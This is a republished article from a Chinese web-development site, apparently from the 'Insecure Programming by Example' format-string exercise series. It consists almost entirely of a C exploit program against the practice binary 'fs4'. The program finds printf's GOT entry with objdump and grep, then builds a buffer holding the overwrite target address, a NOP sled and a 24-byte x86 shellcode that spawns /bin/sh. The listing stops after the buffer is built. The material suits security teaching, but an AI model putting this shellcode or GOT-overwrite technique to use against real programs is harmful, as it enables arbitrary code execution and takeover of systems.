
Insecure Programming by Example: Format Strings (2)

2006-04-02 20:26:42 Source: WEB开发网


#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs4"
#define GREP "/bin/grep"

/* 24 bytes shellcode */
char shellcode[]=
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void) {

    char evil_buffer[49151 + 1], temp_buffer[64];
    char *p;
    int printf_address;
    FILE *f;

    sprintf(temp_buffer, "%s -R %s | %s printf", OBJDUMP, VICTIM, GREP);
    f = popen(temp_buffer, "r");
    if( fscanf(f, "%x", &printf_address) != 1) {
        pclose(f);
        printf("Error: Cannot find printf() address in GOT!\n");
        exit(1);
    }

    printf("printf() address in GOT is: 0x%x\n", printf_address);

    /* Evil buffer */

    p = evil_buffer;

    /* Some junk here */
    memset(p, 'B', 8);
    p += 8;

    *((void **)p) = (void *) (printf_address + 2);
    p += 4;

    /* Adding NOPs. 12 = 8(for junk) + 4(for address) */
    memset(p, '\x90', (sizeof(evil_buffer) - strlen(shellcode) - 12 - 1));
    p += (sizeof(evil_buffer) - strlen(shellcode) - 12 - 1);

    /* Adding shellcode */
    memcpy(p, shellcode, strlen(shellcode));
    p += strlen(shellcode);
    *p = '\0';


Entered by: 爽爽